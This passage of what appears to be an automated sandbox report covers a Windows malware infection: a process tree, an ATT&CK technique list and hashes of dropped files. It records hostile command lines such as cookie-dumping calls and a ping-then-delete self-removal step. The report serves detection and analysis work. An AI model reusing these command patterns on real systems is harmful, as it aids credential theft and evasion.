                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                          8⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5964
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                          8⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5276
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jxomxrxf.sdu\toolspab1.exe & exit
                                                                                                      6⤵
                                                                                                        PID:6300
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jxomxrxf.sdu\toolspab1.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\jxomxrxf.sdu\toolspab1.exe
                                                                                                          7⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:6532
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jxomxrxf.sdu\toolspab1.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\jxomxrxf.sdu\toolspab1.exe
                                                                                                            8⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Checks SCSI registry key(s)
                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                            PID:6736
                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Modifies system certificate store
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:4192
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe" >> NUL
                                                                                                  3⤵
                                                                                                    PID:4368
                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                      ping 127.0.0.1
                                                                                                      4⤵
                                                                                                      • Runs ping.exe
                                                                                                      PID:4948
                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Checks whether UAC is enabled
                                                                                                  PID:4512
                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:6932
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4936
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:3156
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:2220
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5376
                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                1⤵
                                                                                                • Suspicious use of SetThreadContext
                                                                                                • Modifies data under HKEY_USERS
                                                                                                • Modifies registry class
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:416
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                  2⤵
                                                                                                  • Checks processor information in registry
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  • Modifies registry class
                                                                                                  PID:2176
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                  2⤵
                                                                                                  • Drops file in System32 directory
                                                                                                  • Checks processor information in registry
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  • Modifies registry class
                                                                                                  PID:1904
                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                1⤵
                                                                                                • Drops file in Windows directory
                                                                                                • Modifies Internet Explorer settings
                                                                                                • Modifies registry class
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:4864
                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                1⤵
                                                                                                • Modifies Internet Explorer settings
                                                                                                PID:900
                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                1⤵
                                                                                                • Modifies registry class
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:4620
                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                1⤵
                                                                                                • Modifies Internet Explorer settings
                                                                                                • Modifies registry class
                                                                                                PID:5084
                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                C:\Windows\system32\msiexec.exe /V
                                                                                                1⤵
                                                                                                • Enumerates connected drives
                                                                                                • Drops file in Program Files directory
                                                                                                • Drops file in Windows directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                • Modifies registry class
                                                                                                PID:5416
                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding FAE78765EC5756A887BDC07FF74FA7B5 C
                                                                                                  2⤵
                                                                                                  • Loads dropped DLL
                                                                                                  PID:5724
                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 87E6C9E1B00015200C4559F123D9D652
                                                                                                  2⤵
                                                                                                  • Blocklisted process makes network request
                                                                                                  • Loads dropped DLL
                                                                                                  PID:5824
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:5784
                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding DE19C6C1D086B38B85849623ACEF7560 E Global\MSI0000
                                                                                                  2⤵
                                                                                                  • Loads dropped DLL
                                                                                                  PID:636
                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                1⤵
                                                                                                • Modifies registry class
                                                                                                PID:5432
                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                1⤵
                                                                                                • Modifies registry class
                                                                                                PID:5636
                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                1⤵
                                                                                                • Modifies registry class
                                                                                                PID:7092
                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                1⤵
                                                                                                • Modifies registry class
                                                                                                PID:6288
                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                1⤵
                                                                                                  PID:5840
                                                                                                • C:\Windows\explorer.exe
                                                                                                  C:\Windows\explorer.exe
                                                                                                  1⤵
                                                                                                    PID:6116
                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                    1⤵
                                                                                                      PID:5668
                                                                                                    • C:\Windows\explorer.exe
                                                                                                      C:\Windows\explorer.exe
                                                                                                      1⤵
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      PID:4664
                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                      1⤵
                                                                                                        PID:6624
                                                                                                      • C:\Windows\explorer.exe
                                                                                                        C:\Windows\explorer.exe
                                                                                                        1⤵
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:5392
                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                        1⤵
                                                                                                          PID:6980
                                                                                                        • C:\Windows\explorer.exe
                                                                                                          C:\Windows\explorer.exe
                                                                                                          1⤵
                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                          PID:2920
                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                          1⤵
                                                                                                            PID:6464
                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                            c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                            1⤵
                                                                                                              PID:6892
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                              1⤵
                                                                                                                PID:6088
                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                1⤵
                                                                                                                • Modifies registry class
                                                                                                                PID:5860
                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                1⤵
                                                                                                                • Modifies registry class
                                                                                                                PID:2788

                                                                                                              Network

                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                              Persistence

                                                                                                              Registry Run Keys / Startup Folder

                                                                                                              1
                                                                                                              T1060

                                                                                                              BITS Jobs

                                                                                                              1
                                                                                                              T1197

                                                                                                              Defense Evasion

                                                                                                              Modify Registry

                                                                                                              3
                                                                                                              T1112

                                                                                                              BITS Jobs

                                                                                                              1
                                                                                                              T1197

                                                                                                              Install Root Certificate

                                                                                                              1
                                                                                                              T1130

                                                                                                              Credential Access

                                                                                                              Credentials in Files

                                                                                                              2
                                                                                                              T1081

                                                                                                              Discovery

                                                                                                              Software Discovery

                                                                                                              1
                                                                                                              T1518

                                                                                                              Query Registry

                                                                                                              5
                                                                                                              T1012

                                                                                                              System Information Discovery

                                                                                                              6
                                                                                                              T1082

                                                                                                              Security Software Discovery

                                                                                                              1
                                                                                                              T1063

                                                                                                              Peripheral Device Discovery

                                                                                                              2
                                                                                                              T1120

                                                                                                              Remote System Discovery

                                                                                                              1
                                                                                                              T1018

                                                                                                              Collection

                                                                                                              Data from Local System

                                                                                                              2
                                                                                                              T1005

                                                                                                              Command and Control

                                                                                                              Web Service

                                                                                                              1
                                                                                                              T1102

                                                                                                              Replay Monitor

                                                                                                              Loading Replay Monitor...

                                                                                                              Downloads

                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                MD5

                                                                                                                7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                SHA1

                                                                                                                804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                SHA256

                                                                                                                bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                SHA512

                                                                                                                49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                MD5

                                                                                                                7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                SHA1

                                                                                                                804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                SHA256

                                                                                                                bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                SHA512

                                                                                                                49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                              • C:\Program Files\Windows Photo Viewer\RAAVZVNBYC\ultramediaburner.exe
                                                                                                                MD5

                                                                                                                6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                SHA1

                                                                                                                938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                SHA256

                                                                                                                b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                SHA512

                                                                                                                a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                              • C:\Program Files\Windows Photo Viewer\RAAVZVNBYC\ultramediaburner.exe
                                                                                                                MD5

                                                                                                                6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                SHA1

                                                                                                                938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                SHA256

                                                                                                                b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                SHA512

                                                                                                                a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                              • C:\Program Files\install.dat
                                                                                                                MD5

                                                                                                                806c3221a013fec9530762750556c332

                                                                                                                SHA1

                                                                                                                36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                SHA256

                                                                                                                9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                SHA512

                                                                                                                56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                              • C:\Program Files\install.dll
                                                                                                                MD5

                                                                                                                fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                SHA1

                                                                                                                6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                SHA256

                                                                                                                9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                SHA512

                                                                                                                0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D
                                                                                                                MD5

                                                                                                                0d0e81f0756c606f91750b490e71ae7b

                                                                                                                SHA1

                                                                                                                ef11c566a508757912305e8da612c6d2acfc1670

                                                                                                                SHA256

                                                                                                                cb6c9784bb3f77d9fbe4ec75cac232fd33562bced9e7fe26e93a36a3a8941bfc

                                                                                                                SHA512

                                                                                                                4ae3a0af86dd84def89647e2fac6e95e387b48e588ca0884f5fceba365927dc4905912ae7a179b24c55c5d78e93e0ac7a389d501c96e681aa356df2d22d199fc

                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D
                                                                                                                MD5

                                                                                                                a072fbb7049792ccbeb0427fe5518c11

                                                                                                                SHA1

                                                                                                                a5e096e742712d4414ca7e6b9c28739f7b3b4775

                                                                                                                SHA256

                                                                                                                227464e54e8f2060f277481251d071b199b62943f22d9fbf8854b359b458dcdb

                                                                                                                SHA512

                                                                                                                65bf84c905fd99fce565c63fd15b2d815ee71af0d689d24309b1f73868722583e798850a987671ecc27f40059450ad2d92a96a537d475641178ff0e091c523d1

                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DA3B6E45325D5FFF28CF6BAD6065C907_7ACDCC18BE3F9272783F723CF7E4C78B
                                                                                                                MD5

                                                                                                                1a4520ad4336ebd37e010baf45de2e84

                                                                                                                SHA1

                                                                                                                74483d3781aa05844cc5e115b5a558b827780ccf

                                                                                                                SHA256

                                                                                                                c416ff23a24729d0e9e30ec9efbd8b8854f6045c1da15883dbe16db61b9d7284

                                                                                                                SHA512

                                                                                                                d48a860e47de6450953043e1338b3d8d6ea3332e64a729f3e889611e28166bee1722c8db599e30135f4af56f5516f5a1ba7982ea4e9b0fc0fb191e3cbc783931

                                                                                                              • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\TC8CG9ZC.cookie
                                                                                                                MD5

                                                                                                                5f07a0964462d19bf259b251ba8e4cc5

                                                                                                                SHA1

                                                                                                                bb16dacf0fea3f2250dc36d28231d2460aac445e

                                                                                                                SHA256

                                                                                                                e2f220064ab6d0bcc9257afbf42375e8e45dc0de890c213130db4ad060248822

                                                                                                                SHA512

                                                                                                                4dd18c9fa61430bbd8115ad8b65927090e792fc5a46da83302b5e141897c9bfb2d980a8aac057f75a18f592e6bec2da58ff3a62e054807b8716d25ffafa53b04

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1404168539.exe
                                                                                                                MD5

                                                                                                                3a5aa6041f6987d4b375ef6c9d3728d1

                                                                                                                SHA1

                                                                                                                f40bcc90890cc1d848abdb163d6a3744712508d0

                                                                                                                SHA256

                                                                                                                2b85bbff2d434d0400c41fdefc2c8630b7895a5fa7f988775e0787814ca8529f

                                                                                                                SHA512

                                                                                                                8f9dc4b8aca6738992d8d6b5a2185dac50613ee233e4684bc43034627e99a7be0049700f766dbe36e1d2458cee3e7b26d5c23c2fe59296f0524a02536d389e1c

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1404168539.exe
                                                                                                                MD5

                                                                                                                3a5aa6041f6987d4b375ef6c9d3728d1

                                                                                                                SHA1

                                                                                                                f40bcc90890cc1d848abdb163d6a3744712508d0

                                                                                                                SHA256

                                                                                                                2b85bbff2d434d0400c41fdefc2c8630b7895a5fa7f988775e0787814ca8529f

                                                                                                                SHA512

                                                                                                                8f9dc4b8aca6738992d8d6b5a2185dac50613ee233e4684bc43034627e99a7be0049700f766dbe36e1d2458cee3e7b26d5c23c2fe59296f0524a02536d389e1c

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1b-d5f74-3a8-f98a2-1e1a7fbc6a975\Kenessey.txt
                                                                                                                MD5

                                                                                                                97384261b8bbf966df16e5ad509922db

                                                                                                                SHA1

                                                                                                                2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                                SHA256

                                                                                                                9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                                SHA512

                                                                                                                b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1b-d5f74-3a8-f98a2-1e1a7fbc6a975\Vusawunaera.exe
                                                                                                                MD5

                                                                                                                24988abf1cac1c74e9385b4bff16e8f7

                                                                                                                SHA1

                                                                                                                50bae2be9668aad4f3a3a7d404c731f541b12f67

                                                                                                                SHA256

                                                                                                                afad8cc3e378f4d22ca2e325a63998e4bcbb70509135532b450c22fdd47e993c

                                                                                                                SHA512

                                                                                                                a707b54611976264a3671907faabd817e58e4ee572637ad1193b7c346b7cb63b98a8e52a87cb2b135a5e40f0e97e3f040a04804c0164a1d6caa856b2f1fe742f

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1b-d5f74-3a8-f98a2-1e1a7fbc6a975\Vusawunaera.exe
                                                                                                                MD5

                                                                                                                24988abf1cac1c74e9385b4bff16e8f7

                                                                                                                SHA1

                                                                                                                50bae2be9668aad4f3a3a7d404c731f541b12f67

                                                                                                                SHA256

                                                                                                                afad8cc3e378f4d22ca2e325a63998e4bcbb70509135532b450c22fdd47e993c

                                                                                                                SHA512

                                                                                                                a707b54611976264a3671907faabd817e58e4ee572637ad1193b7c346b7cb63b98a8e52a87cb2b135a5e40f0e97e3f040a04804c0164a1d6caa856b2f1fe742f

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1b-d5f74-3a8-f98a2-1e1a7fbc6a975\Vusawunaera.exe.config
                                                                                                                MD5

                                                                                                                98d2687aec923f98c37f7cda8de0eb19

                                                                                                                SHA1

                                                                                                                f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                SHA256

                                                                                                                8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                SHA512

                                                                                                                95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3cbtndnu.5qs\sskiper.exe
                                                                                                                MD5

                                                                                                                4957402561fcfa555d04142577662074

                                                                                                                SHA1

                                                                                                                f03275e4749030011d6e74d26e41bc0e5a2bf635

                                                                                                                SHA256

                                                                                                                9119c14b73b45a6a7e134559ba2ce583f6e4111c81911a5e0abd28e950798018

                                                                                                                SHA512

                                                                                                                70f5f83e0de334d394ece1ff06cc203080bb877ae1938e24543b5b4a0dd5d6c4f61244d98d5f734387a2e082e7395e321c9d69c2e46ac06eb3098a7e5c00bb4a

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3cbtndnu.5qs\sskiper.exe
                                                                                                                MD5

                                                                                                                4957402561fcfa555d04142577662074

                                                                                                                SHA1

                                                                                                                f03275e4749030011d6e74d26e41bc0e5a2bf635

                                                                                                                SHA256

                                                                                                                9119c14b73b45a6a7e134559ba2ce583f6e4111c81911a5e0abd28e950798018

                                                                                                                SHA512

                                                                                                                70f5f83e0de334d394ece1ff06cc203080bb877ae1938e24543b5b4a0dd5d6c4f61244d98d5f734387a2e082e7395e321c9d69c2e46ac06eb3098a7e5c00bb4a

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\MSI9BAB.tmp
                                                                                                                MD5

                                                                                                                d07ddd437009ebb9c21882579bf2df0d

                                                                                                                SHA1

                                                                                                                a24a636db25ed29e5353fa5d274bf80c2ab8ad98

                                                                                                                SHA256

                                                                                                                c4f49b995e259a043af81d987c6781b8736f5709348bb997edad183ccc396caf

                                                                                                                SHA512

                                                                                                                8c845ec3effc0041db3a550adddc1f175e1169ca00767c89d38fabaa59f97ae987b529c0ad71d0def0007a21fb3fd98200b0834408c5889d93f9ea035c60eca3

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\MSI9EC9.tmp
                                                                                                                MD5

                                                                                                                5a25fb13ed470b77eefd2eb89cb62c47

                                                                                                                SHA1

                                                                                                                3dbe567e3c8c8cd0f7e3c71a2536578ee11bf2a6

                                                                                                                SHA256

                                                                                                                0dca4854897ca77080c57936ad5c7c6c5f5c656a5785c09c7d2c1d196e4f3336

                                                                                                                SHA512

                                                                                                                2ec64666ad42e955e91378af855da59d3bcfb4cc3574bf023dda878c7d3e3dec442625de6e6b0434d1caf86a525395b04038cf7fdc6c292405d9f19c6f4e9952

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                MD5

                                                                                                                41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                SHA1

                                                                                                                0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                SHA256

                                                                                                                97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                SHA512

                                                                                                                5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                MD5

                                                                                                                41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                SHA1

                                                                                                                0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                SHA256

                                                                                                                97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                SHA512

                                                                                                                5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                MD5

                                                                                                                3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                SHA1

                                                                                                                55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                SHA256

                                                                                                                4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                SHA512

                                                                                                                f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                MD5

                                                                                                                3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                SHA1

                                                                                                                55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                SHA256

                                                                                                                4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                SHA512

                                                                                                                f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                MD5

                                                                                                                3bc84c0e8831842f2ae263789217245d

                                                                                                                SHA1

                                                                                                                d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                                SHA256

                                                                                                                757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                                SHA512

                                                                                                                f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                MD5

                                                                                                                3bc84c0e8831842f2ae263789217245d

                                                                                                                SHA1

                                                                                                                d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                                SHA256

                                                                                                                757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                                SHA512

